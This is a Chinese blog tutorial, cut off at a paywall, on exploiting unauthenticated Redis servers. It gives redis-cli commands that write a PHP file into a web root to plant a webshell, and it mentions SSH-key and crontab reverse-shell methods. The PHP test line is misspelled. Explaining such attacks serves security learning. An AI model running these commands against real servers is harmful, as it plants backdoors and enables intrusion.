中间件框架漏洞-Readis未授权访问漏洞

本文探讨了Redis未授权访问的原理,当Redis服务端口开放且无密码认证时,允许任意用户进行未授权操作。文章详细介绍了三种利用这种漏洞的方法:通过Redis写入webshell,写入SSH公钥获取shell,以及利用crontab反弹shell。
摘要由CSDN通过智能技术生成

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档


提示:以下是本篇文章正文内容,下面案例可供参考

一、Redis未授权原理

原理:简单的理解,当redis服务(6379)端口对外开放且未做密码认证时,任意用户可未授权访问redis服务并操作获取数据。

二、三种利用redis未授予权访问漏洞

1.利用redis写webshell

1.redis-cli -h 192.168.75.131
2.config set dir /var/www/html
3.config set dbfilename redis.php
4.set x "\r\n\r\n<?php phphinfo();?>\r\n\r\n" 这样就成功写如shell

可以写入一句话木马,菜刀连接
当数据库过大时,redis写shell的小技巧:(借鉴学习的)如下

<?php 
set_time_limit
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值